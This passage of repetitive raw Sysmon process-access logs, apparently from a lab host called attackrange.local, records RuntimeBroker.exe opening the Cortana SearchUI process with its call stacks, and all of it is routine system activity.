13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 